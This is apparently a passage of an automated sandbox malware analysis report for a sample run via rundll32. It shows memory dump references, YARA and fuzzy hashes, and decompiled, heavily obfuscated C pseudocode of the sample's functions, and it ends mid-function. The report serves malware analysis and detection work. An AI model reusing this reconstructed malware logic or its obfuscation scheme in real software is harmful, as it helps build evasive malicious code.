                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Du$av$d)4$sZ|
                                                                                                                                                            • API String ID: 0-269012183
                                                                                                                                                            • Opcode ID: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                                            • Instruction ID: 2e8441b25c343f3657b39cad97ac7a6d66c0c9b3727e48abeca232a953e41045
                                                                                                                                                            • Opcode Fuzzy Hash: dfc967cf0c468e8d72dd3f4d8ef6424ad64969c011c2b846f478a6ab0dae1b6b
                                                                                                                                                            • Instruction Fuzzy Hash: 0C5112B1D00209EBDF19DFE5C94A8EEBBB1FB48318F108159E412B6260D3755A59DFA0
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10043730 Relevance: 4.5, APIs: 3, Instructions: 39threadCOMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • GetThreadLocale.KERNEL32 ref: 10043743
                                                                                                                                                            • GetLocaleInfoA.KERNEL32(00000000,00001004,?,00000007), ref: 10043755
                                                                                                                                                            • GetACP.KERNEL32 ref: 1004377E
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Locale$InfoThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4232894706-0
                                                                                                                                                            • Opcode ID: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                                            • Instruction ID: 788673dfdacf9fce6eb7172e6dd538a5e2a4211a9e61a4e82855ee0bc522c5dc
                                                                                                                                                            • Opcode Fuzzy Hash: 138607bedea967b7fe84d9a3997690d852697f2840ddf7cd3550f999a21f7b57
                                                                                                                                                            • Instruction Fuzzy Hash: 8AF0C871E04238ABE715DBA489955EFB7E4EB09A81B11816CD981E7251EA206D0487C9
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 10018C9A Relevance: 4.5, APIs: 3, Instructions: 37COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492205069.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492195551.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492332471.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492341762.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492365226.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492373572.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID:
                                                                                                                                                            • Opcode ID: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                                            • Instruction ID: 3e933570e0ddfcbf732aafa8bdad2c1db21bb76b11c706ff9f14b0ef8e609435
                                                                                                                                                            • Opcode Fuzzy Hash: fb0f3e1e5a18f2ff69a806334b974a9f52d4ac6ab5fd56aeff2c93c24eadb245
                                                                                                                                                            • Instruction Fuzzy Hash: 63F03731505119EBDF01DF70CD48AAE3FA9FB04284F008020FD09D9060EB31EB95EBA1
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00380E53 Relevance: 4.1, Strings: 3, Instructions: 343COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 83%
                                                                                                                                                            			E00380E53(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				char _v2080;
				char _v2600;
				signed int _v2604;
				signed int _v2608;
				signed int _v2612;
				signed int _v2616;
				signed int _v2620;
				signed int _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _t406;
				signed int _t426;
				signed int _t427;
				signed int _t428;
				signed int _t429;
				signed int _t430;
				signed int _t435;
				void* _t467;
				void* _t468;
				signed int* _t472;

				_t472 =  &_v2772;
				_v2700 = 0xd36ba7;
				_v2700 = _v2700 << 7;
				_v2700 = _v2700 ^ 0xaed70c65;
				_v2700 = _v2700 ^ 0xc762dfcc;
				_v2652 = 0x6f4609;
				_t9 =  &_v2652; // 0x6f4609
				_v2652 =  *_t9 * 0x1c;
				_t467 = __ecx;
				_v2652 = _v2652 ^ 0x0c23569d;
				_t468 = 0xea1969c;
				_v2608 = 0xb8394b;
				_v2608 = _v2608 + 0xaeb5;
				_v2608 = _v2608 ^ 0x00b390c3;
				_v2736 = 0x3d33f1;
				_v2736 = _v2736 + 0xffffd537;
				_v2736 = _v2736 + 0xffffb6ee;
				_v2736 = _v2736 + 0xbad8;
				_v2736 = _v2736 ^ 0x003e0409;
				_v2768 = 0xd1d4ce;
				_v2768 = _v2768 >> 0xc;
				_v2768 = _v2768 ^ 0xb5c37fe4;
				_v2768 = _v2768 + 0x4eb3;
				_v2768 = _v2768 ^ 0xb5c2c9c4;
				_v2760 = 0x157bbd;
				_v2760 = _v2760 ^ 0x6d7617e7;
				_v2760 = _v2760 ^ 0x1b56cd2f;
				_v2760 = _v2760 ^ 0xfb63426d;
				_v2760 = _v2760 ^ 0x8d577604;
				_v2604 = 0x1fac8b;
				_v2604 = _v2604 + 0x9962;
				_v2604 = _v2604 ^ 0x0029d956;
				_v2696 = 0x3d46b4;
				_v2696 = _v2696 | 0x3d7fd3ff;
				_v2696 = _v2696 ^ 0x3d7bd02d;
				_v2720 = 0xad1695;
				_t426 = 9;
				_v2720 = _v2720 * 0x4b;
				_v2720 = _v2720 >> 0x10;
				_v2720 = _v2720 << 0xe;
				_v2720 = _v2720 ^ 0x0cab1f79;
				_v2644 = 0xe14118;
				_v2644 = _v2644 ^ 0x82369820;
				_v2644 = _v2644 ^ 0x82de8a4e;
				_v2668 = 0x391c30;
				_v2668 = _v2668 >> 7;
				_v2668 = _v2668 + 0xffff3589;
				_v2668 = _v2668 ^ 0xfff6d862;
				_v2692 = 0x9dbc3;
				_v2692 = _v2692 << 8;
				_v2692 = _v2692 * 0x75;
				_v2692 = _v2692 ^ 0x81749ad9;
				_v2660 = 0x144a46;
				_v2660 = _v2660 >> 0xd;
				_v2660 = _v2660 ^ 0x0008b8c7;
				_v2752 = 0x703c03;
				_v2752 = _v2752 * 0x74;
				_v2752 = _v2752 ^ 0x2e54cb21;
				_v2752 = _v2752 | 0x6f17e683;
				_v2752 = _v2752 ^ 0x7f96e2f0;
				_v2676 = 0xa438e5;
				_v2676 = _v2676 / _t426;
				_v2676 = _v2676 + 0x92ff;
				_v2676 = _v2676 ^ 0x0015b827;
				_v2612 = 0x1c48b9;
				_t427 = 0x1a;
				_v2612 = _v2612 / _t427;
				_v2612 = _v2612 ^ 0x000154fb;
				_v2628 = 0x490198;
				_v2628 = _v2628 | 0x561f6486;
				_v2628 = _v2628 ^ 0x565ec1b9;
				_v2616 = 0xcec4ed;
				_t428 = 0x3d;
				_v2616 = _v2616 * 9;
				_v2616 = _v2616 ^ 0x074f393e;
				_v2636 = 0x4be85b;
				_v2636 = _v2636 >> 1;
				_v2636 = _v2636 ^ 0x002afd34;
				_v2728 = 0xca47ed;
				_v2728 = _v2728 << 1;
				_v2728 = _v2728 / _t428;
				_v2728 = _v2728 >> 3;
				_v2728 = _v2728 ^ 0x00084593;
				_v2620 = 0x793301;
				_v2620 = _v2620 | 0xccc0d5da;
				_v2620 = _v2620 ^ 0xccf56683;
				_v2684 = 0xd6c9e7;
				_v2684 = _v2684 >> 8;
				_v2684 = _v2684 + 0x30fc;
				_v2684 = _v2684 ^ 0x000dbf27;
				_v2656 = 0x6cf887;
				_v2656 = _v2656 | 0x54469415;
				_v2656 = _v2656 ^ 0x5469dd96;
				_v2712 = 0x1ba43e;
				_v2712 = _v2712 + 0xffff54b6;
				_v2712 = _v2712 >> 0x10;
				_v2712 = _v2712 ^ 0x536d0b9d;
				_v2712 = _v2712 ^ 0x5368fd88;
				_v2744 = 0x7fa81e;
				_v2744 = _v2744 + 0x45dd;
				_v2744 = _v2744 | 0xcc5c3b14;
				_t429 = 0x76;
				_v2744 = _v2744 * 0x48;
				_v2744 = _v2744 ^ 0x83f6fb81;
				_v2704 = 0x73cce1;
				_v2704 = _v2704 >> 6;
				_v2704 = _v2704 | 0x0e0742c3;
				_v2704 = _v2704 ^ 0x0e0521c8;
				_v2764 = 0x3737a7;
				_v2764 = _v2764 >> 0xb;
				_v2764 = _v2764 << 3;
				_v2764 = _v2764 + 0x14ac;
				_v2764 = _v2764 ^ 0x0004654a;
				_v2772 = 0xaeb57f;
				_v2772 = _v2772 / _t429;
				_v2772 = _v2772 << 0xf;
				_t430 = 0x37;
				_v2772 = _v2772 / _t430;
				_v2772 = _v2772 ^ 0x037ee988;
				_v2648 = 0x954498;
				_t431 = 0x4b;
				_v2648 = _v2648 / _t431;
				_v2648 = _v2648 ^ 0x00054dec;
				_v2640 = 0x8be41e;
				_v2640 = _v2640 >> 0xd;
				_v2640 = _v2640 ^ 0x00089615;
				_v2748 = 0xfabe1b;
				_v2748 = _v2748 ^ 0xff42a680;
				_v2748 = _v2748 + 0xffff8ee7;
				_v2748 = _v2748 + 0x1c5a;
				_v2748 = _v2748 ^ 0xffbaa703;
				_v2756 = 0x33a01d;
				_v2756 = _v2756 * 0x6f;
				_v2756 = _v2756 << 4;
				_v2756 = _v2756 >> 4;
				_v2756 = _v2756 ^ 0x066d94da;
				_v2672 = 0x7cb69f;
				_v2672 = _v2672 << 4;
				_v2672 = _v2672 * 0x4a;
				_v2672 = _v2672 ^ 0x40c5c2d0;
				_v2680 = 0xc0e1f8;
				_v2680 = _v2680 << 1;
				_v2680 = _v2680 | 0xa5ca1830;
				_v2680 = _v2680 ^ 0xa5ca6401;
				_v2732 = 0xd52773;
				_v2732 = _v2732 ^ 0x8b84e9f5;
				_v2732 = _v2732 + 0xffffa58a;
				_v2732 = _v2732 >> 1;
				_v2732 = _v2732 ^ 0x45a69f9f;
				_v2740 = 0x525c84;
				_v2740 = _v2740 * 0x45;
				_v2740 = _v2740 << 0xd;
				_v2740 = _v2740 + 0xffffe485;
				_v2740 = _v2740 ^ 0x5df42895;
				_v2688 = 0x8afd1b;
				_v2688 = _v2688 >> 0xa;
				_v2688 = _v2688 * 0x44;
				_v2688 = _v2688 ^ 0x000c822b;
				_v2632 = 0xb6ec99;
				_v2632 = _v2632 + 0xffff2a9a;
				_v2632 = _v2632 ^ 0x00b1db1a;
				_v2664 = 0xfa37e2;
				_v2664 = _v2664 * 0x4c;
				_v2664 = _v2664 + 0x9251;
				_v2664 = _v2664 ^ 0x4a4e0c53;
				_v2708 = 0xf9311d;
				_v2708 = _v2708 >> 2;
				_t406 = _v2708 * 0x30;
				_v2708 = _t406;
				_v2708 = _v2708 + 0xffffde46;
				_v2708 = _v2708 ^ 0x0bad021b;
				_v2624 = 0x51d14;
				_v2624 = _v2624 | 0x271919e8;
				_v2624 = _v2624 ^ 0x2716653c;
				_v2716 = 0x708eea;
				_v2716 = _v2716 + 0xfffff8d8;
				_v2716 = _v2716 | 0x4ca3cf3c;
				_v2716 = _v2716 ^ 0x396f5f4d;
				_v2716 = _v2716 ^ 0x7599e4cd;
				_v2724 = 0x3acc77;
				_v2724 = _v2724 + 0x56d;
				_v2724 = _v2724 + 0xb0bb;
				_v2724 = _v2724 + 0xffffce89;
				_v2724 = _v2724 ^ 0x003c4612;
				while(_t468 != 0x5de06da) {
					if(_t468 == 0xea1969c) {
						_t468 = 0xfa9128f;
						continue;
					} else {
						_t480 = _t468 - 0xfa9128f;
						if(_t468 != 0xfa9128f) {
							L8:
							__eflags = _t468 - 0xa8e801c;
							if(__eflags != 0) {
								continue;
							}
						} else {
							E0038DA22(_v2652, _v2608, _t480, _v2736,  &_v2600, _t431, _v2768);
							 *((short*)(E0037B6CF( &_v2600, _v2760, _v2604, _v2696))) = 0;
							E00378969(_v2720,  &_v1560, _t480, _v2644, _v2668);
							_push(_v2752);
							_push(_v2660);
							E003747CE( &_v2600, _v2676, _v2692, _v2612, _v2628, E0038DCF7(_v2692, 0x371308, _t480),  &_v1560, _v2616, _v2636);
							E0037A8B0(_v2728, _t419, _v2620);
							_t431 = _v2684;
							_t406 = E0037EA99(_v2684, _t467, _v2656, _v2712,  &_v2080, _v2744);
							_t472 =  &(_t472[0x17]);
							if(_t406 != 0) {
								_t468 = 0x5de06da;
								continue;
							}
						}
					}
					return _t406;
				}
				_push(_v2648);
				_push(_v2700);
				_push(_v2772);
				_push( &_v1040);
				E003846BB(_v2704, _v2764);
				_push(_v2756);
				_push(_v2748);
				E003747CE( &_v1040, _v2672, _v2640, _v2680, _v2732, E0038DCF7(_v2640, 0x3713b8, __eflags),  &_v2080, _v2740, _v2688);
				_t435 = _v2632;
				E0037A8B0(_t435, _t409, _v2664);
				__eflags = 0;
				_push(_v2724);
				_push(0);
				_push(_t435);
				_push(0);
				_push(0);
				_push(_v2716);
				_t431 = _v2708;
				_push( &_v520);
				_t406 = E0037AB87(_v2708, _v2624, 0);
				_t472 = _t472 - 0xc + 0x64;
				_t468 = 0xa8e801c;
				goto L8;
			}





























































                                                                                                                                                            0x00380e53
                                                                                                                                                            0x00380e59
                                                                                                                                                            0x00380e63
                                                                                                                                                            0x00380e68
                                                                                                                                                            0x00380e70
                                                                                                                                                            0x00380e78
                                                                                                                                                            0x00380e80
                                                                                                                                                            0x00380e89
                                                                                                                                                            0x00380e90
                                                                                                                                                            0x00380e92
                                                                                                                                                            0x00380e9d
                                                                                                                                                            0x00380ea2
                                                                                                                                                            0x00380ead
                                                                                                                                                            0x00380eb8
                                                                                                                                                            0x00380ec3
                                                                                                                                                            0x00380ecb
                                                                                                                                                            0x00380ed3
                                                                                                                                                            0x00380edb
                                                                                                                                                            0x00380ee3
                                                                                                                                                            0x00380eeb
                                                                                                                                                            0x00380ef3
                                                                                                                                                            0x00380ef8
                                                                                                                                                            0x00380f00
                                                                                                                                                            0x00380f08
                                                                                                                                                            0x00380f10
                                                                                                                                                            0x00380f18
                                                                                                                                                            0x00380f20
                                                                                                                                                            0x00380f28
                                                                                                                                                            0x00380f30
                                                                                                                                                            0x00380f38
                                                                                                                                                            0x00380f43
                                                                                                                                                            0x00380f4e
                                                                                                                                                            0x00380f59
                                                                                                                                                            0x00380f61
                                                                                                                                                            0x00380f69
                                                                                                                                                            0x00380f71
                                                                                                                                                            0x00380f80
                                                                                                                                                            0x00380f83
                                                                                                                                                            0x00380f87
                                                                                                                                                            0x00380f8c
                                                                                                                                                            0x00380f91
                                                                                                                                                            0x00380f99
                                                                                                                                                            0x00380fa4
                                                                                                                                                            0x00380faf
                                                                                                                                                            0x00380fba
                                                                                                                                                            0x00380fc2
                                                                                                                                                            0x00380fc7
                                                                                                                                                            0x00380fcf
                                                                                                                                                            0x00380fd7
                                                                                                                                                            0x00380fdf
                                                                                                                                                            0x00380fe9
                                                                                                                                                            0x00380fed
                                                                                                                                                            0x00380ff5
                                                                                                                                                            0x00381000
                                                                                                                                                            0x00381008
                                                                                                                                                            0x00381013
                                                                                                                                                            0x00381020
                                                                                                                                                            0x00381024
                                                                                                                                                            0x0038102c
                                                                                                                                                            0x00381034
                                                                                                                                                            0x0038103c
                                                                                                                                                            0x0038104c
                                                                                                                                                            0x00381050
                                                                                                                                                            0x00381058
                                                                                                                                                            0x00381060
                                                                                                                                                            0x00381072
                                                                                                                                                            0x00381075
                                                                                                                                                            0x0038107c
                                                                                                                                                            0x00381089
                                                                                                                                                            0x00381094
                                                                                                                                                            0x0038109f
                                                                                                                                                            0x003810aa
                                                                                                                                                            0x003810bf
                                                                                                                                                            0x003810c2
                                                                                                                                                            0x003810c9
                                                                                                                                                            0x003810d4
                                                                                                                                                            0x003810df
                                                                                                                                                            0x003810e6
                                                                                                                                                            0x003810f1
                                                                                                                                                            0x003810f9
                                                                                                                                                            0x00381105
                                                                                                                                                            0x00381109
                                                                                                                                                            0x0038110e
                                                                                                                                                            0x00381116
                                                                                                                                                            0x00381121
                                                                                                                                                            0x0038112c
                                                                                                                                                            0x00381137
                                                                                                                                                            0x0038113f
                                                                                                                                                            0x00381144
                                                                                                                                                            0x0038114c
                                                                                                                                                            0x00381154
                                                                                                                                                            0x0038115f
                                                                                                                                                            0x0038116a
                                                                                                                                                            0x00381175
                                                                                                                                                            0x0038117d
                                                                                                                                                            0x00381185
                                                                                                                                                            0x0038118a
                                                                                                                                                            0x00381192
                                                                                                                                                            0x0038119a
                                                                                                                                                            0x003811a2
                                                                                                                                                            0x003811aa
                                                                                                                                                            0x003811b7
                                                                                                                                                            0x003811ba
                                                                                                                                                            0x003811be
                                                                                                                                                            0x003811c6
                                                                                                                                                            0x003811ce
                                                                                                                                                            0x003811d3
                                                                                                                                                            0x003811db
                                                                                                                                                            0x003811e3
                                                                                                                                                            0x003811eb
                                                                                                                                                            0x003811f0
                                                                                                                                                            0x003811f5
                                                                                                                                                            0x003811fd
                                                                                                                                                            0x00381205
                                                                                                                                                            0x00381215
                                                                                                                                                            0x00381219
                                                                                                                                                            0x00381222
                                                                                                                                                            0x00381227
                                                                                                                                                            0x0038122d
                                                                                                                                                            0x00381235
                                                                                                                                                            0x00381247
                                                                                                                                                            0x0038124a
                                                                                                                                                            0x00381251
                                                                                                                                                            0x0038125c
                                                                                                                                                            0x00381267
                                                                                                                                                            0x0038126f
                                                                                                                                                            0x0038127a
                                                                                                                                                            0x00381282
                                                                                                                                                            0x0038128a
                                                                                                                                                            0x00381292
                                                                                                                                                            0x0038129a
                                                                                                                                                            0x003812a7
                                                                                                                                                            0x003812b9
                                                                                                                                                            0x003812bd
                                                                                                                                                            0x003812c2
                                                                                                                                                            0x003812c7
                                                                                                                                                            0x003812cf
                                                                                                                                                            0x003812d7
                                                                                                                                                            0x003812e1
                                                                                                                                                            0x003812e5
                                                                                                                                                            0x003812ed
                                                                                                                                                            0x003812f5
                                                                                                                                                            0x003812f9
                                                                                                                                                            0x00381301
                                                                                                                                                            0x00381309
                                                                                                                                                            0x00381311
                                                                                                                                                            0x00381319
                                                                                                                                                            0x00381321
                                                                                                                                                            0x00381325
                                                                                                                                                            0x0038132d
                                                                                                                                                            0x0038133a
                                                                                                                                                            0x0038133e
                                                                                                                                                            0x00381343
                                                                                                                                                            0x0038134b
                                                                                                                                                            0x00381353
                                                                                                                                                            0x0038135b
                                                                                                                                                            0x00381365
                                                                                                                                                            0x00381369
                                                                                                                                                            0x00381371
                                                                                                                                                            0x0038137c
                                                                                                                                                            0x00381387
                                                                                                                                                            0x00381392
                                                                                                                                                            0x0038139f
                                                                                                                                                            0x003813a3
                                                                                                                                                            0x003813ab
                                                                                                                                                            0x003813b3
                                                                                                                                                            0x003813bb
                                                                                                                                                            0x003813c0
                                                                                                                                                            0x003813c5
                                                                                                                                                            0x003813c9
                                                                                                                                                            0x003813d1
                                                                                                                                                            0x003813d9
                                                                                                                                                            0x003813e4
                                                                                                                                                            0x003813ef
                                                                                                                                                            0x003813fa
                                                                                                                                                            0x00381402
                                                                                                                                                            0x0038140a
                                                                                                                                                            0x00381412
                                                                                                                                                            0x0038141a
                                                                                                                                                            0x00381422
                                                                                                                                                            0x0038142a
                                                                                                                                                            0x00381432
                                                                                                                                                            0x0038143a
                                                                                                                                                            0x00381442
                                                                                                                                                            0x0038144a
                                                                                                                                                            0x00381458
                                                                                                                                                            0x00381572
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038145e
                                                                                                                                                            0x0038145e
                                                                                                                                                            0x00381460
                                                                                                                                                            0x0038163b
                                                                                                                                                            0x0038163b
                                                                                                                                                            0x00381641
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00381466
                                                                                                                                                            0x00381485
                                                                                                                                                            0x003814bc
                                                                                                                                                            0x003814c3
                                                                                                                                                            0x003814c8
                                                                                                                                                            0x003814d1
                                                                                                                                                            0x00381524
                                                                                                                                                            0x00381536
                                                                                                                                                            0x00381554
                                                                                                                                                            0x0038155b
                                                                                                                                                            0x00381560
                                                                                                                                                            0x00381565
                                                                                                                                                            0x0038156b
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0038156b
                                                                                                                                                            0x00381565
                                                                                                                                                            0x00381460
                                                                                                                                                            0x00381651
                                                                                                                                                            0x00381651
                                                                                                                                                            0x00381579
                                                                                                                                                            0x00381587
                                                                                                                                                            0x0038158b
                                                                                                                                                            0x0038159a
                                                                                                                                                            0x0038159b
                                                                                                                                                            0x003815a0
                                                                                                                                                            0x003815a9
                                                                                                                                                            0x003815f0
                                                                                                                                                            0x003815fc
                                                                                                                                                            0x00381605
                                                                                                                                                            0x0038160d
                                                                                                                                                            0x0038160f
                                                                                                                                                            0x00381613
                                                                                                                                                            0x00381614
                                                                                                                                                            0x00381615
                                                                                                                                                            0x00381616
                                                                                                                                                            0x00381617
                                                                                                                                                            0x00381629
                                                                                                                                                            0x0038162d
                                                                                                                                                            0x0038162e
                                                                                                                                                            0x00381633
                                                                                                                                                            0x00381636
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: Fo$M_o9$[K
                                                                                                                                                            • API String ID: 0-3743190696
                                                                                                                                                            • Opcode ID: 7e8a23495d65c90e08f7d2b8c8d0d77523ef81c28855e976aaa16928088556cf
                                                                                                                                                            • Instruction ID: b3d79d3094c2d14026b189b8150aa5f92d399eab0bea1b453c5b0d0a028afbd4
                                                                                                                                                            • Opcode Fuzzy Hash: 7e8a23495d65c90e08f7d2b8c8d0d77523ef81c28855e976aaa16928088556cf
                                                                                                                                                            • Instruction Fuzzy Hash: 03121EB14093818FD3A9CF21C58AA8BBBF1FBC5748F10891DE5DA96260D7B58909CF13
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00379DCF Relevance: 4.1, Strings: 3, Instructions: 315COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 80%
                                                                                                                                                            			E00379DCF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				intOrPtr _v136;
				char _v160;
				short _v708;
				short _v710;
				char _v712;
				signed int _v756;
				char _v1276;
				char _v1796;
				void* _t278;
				signed int _t306;
				signed int _t310;
				void* _t312;
				intOrPtr _t317;
				void* _t319;
				signed int _t324;
				void* _t327;
				void* _t353;
				signed int _t365;
				signed int _t366;
				signed int _t367;
				signed int _t368;
				signed int _t369;
				signed int _t370;
				void* _t373;
				void* _t374;

				_t317 = _a12;
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_t317);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003820B9(_t278);
				_v44 = 0x411c30;
				_t374 = _t373 + 0x20;
				_v44 = _v44 ^ 0x3aebcc2b;
				_v44 = _v44 ^ 0x10090153;
				_t319 = 0x338c922;
				_v44 = _v44 ^ 0x2aa3d158;
				_v56 = 0xa7c140;
				_v56 = _v56 >> 1;
				_v56 = _v56 ^ 0xbf613798;
				_v56 = _v56 ^ 0xbf3c535c;
				_v88 = 0xb7ebf9;
				_t365 = 0x52;
				_v88 = _v88 / _t365;
				_v88 = _v88 ^ 0x0004e01e;
				_v112 = 0x1a3e5b;
				_v112 = _v112 + 0xd588;
				_v112 = _v112 ^ 0x0012c9bc;
				_v8 = 0x55b84a;
				_t366 = 0x72;
				_v8 = _v8 * 0x74;
				_v8 = _v8 + 0xffff07de;
				_v8 = _v8 * 0x41;
				_v8 = _v8 ^ 0xdc74eedb;
				_v96 = 0x123c4e;
				_v96 = _v96 + 0x1d06;
				_v96 = _v96 ^ 0x001f978b;
				_v124 = 0x58f8d3;
				_v124 = _v124 * 0x2b;
				_v124 = _v124 ^ 0x0efbe47e;
				_v120 = 0x58d481;
				_v120 = _v120 << 5;
				_v120 = _v120 ^ 0x0b1fdd63;
				_v32 = 0x85548e;
				_v32 = _v32 / _t366;
				_v32 = _v32 * 0x2e;
				_v32 = _v32 ^ 0x0037cfdf;
				_v108 = 0x851b7a;
				_v108 = _v108 | 0xf3ff5f40;
				_v108 = _v108 ^ 0xf3fc1521;
				_v76 = 0x86d28f;
				_v76 = _v76 >> 0xd;
				_v76 = _v76 ^ 0x000a85f2;
				_v48 = 0x8a8988;
				_v48 = _v48 + 0xffff9d54;
				_v48 = _v48 + 0xffffb441;
				_v48 = _v48 ^ 0x008c2bbe;
				_v80 = 0x3fe2a4;
				_v80 = _v80 ^ 0x5e00b743;
				_v80 = _v80 ^ 0x5e39b1b0;
				_v116 = 0x4ea08b;
				_v116 = _v116 + 0xffffca32;
				_v116 = _v116 ^ 0x00427ef9;
				_v104 = 0xba6181;
				_v104 = _v104 + 0xf529;
				_v104 = _v104 ^ 0x00b33727;
				_v52 = 0x1e8210;
				_v52 = _v52 >> 8;
				_v52 = _v52 | 0xffb97487;
				_v52 = _v52 ^ 0xffb16a42;
				_v40 = 0xeabfd3;
				_v40 = _v40 ^ 0x26644279;
				_t367 = 0x3a;
				_v40 = _v40 / _t367;
				_v40 = _v40 ^ 0x00a36ea5;
				_v12 = 0xc9f67b;
				_v12 = _v12 + 0x836b;
				_v12 = _v12 | 0xa1408986;
				_t368 = 0x45;
				_v12 = _v12 * 0x75;
				_v12 = _v12 ^ 0xf1cc1c9a;
				_v36 = 0x1f6921;
				_v36 = _v36 ^ 0x9bf749ed;
				_v36 = _v36 / _t368;
				_v36 = _v36 ^ 0x024ed910;
				_v64 = 0x37ccf2;
				_v64 = _v64 + 0xfffff775;
				_t369 = 0x19;
				_v64 = _v64 * 0x24;
				_v64 = _v64 ^ 0x07d7b77b;
				_v28 = 0x370f8;
				_v28 = _v28 << 0xd;
				_v28 = _v28 + 0x6470;
				_v28 = _v28 >> 1;
				_v28 = _v28 ^ 0x37097055;
				_v20 = 0x84152c;
				_v20 = _v20 * 0x7e;
				_v20 = _v20 / _t369;
				_v20 = _v20 << 0xe;
				_v20 = _v20 ^ 0x6c90d6a3;
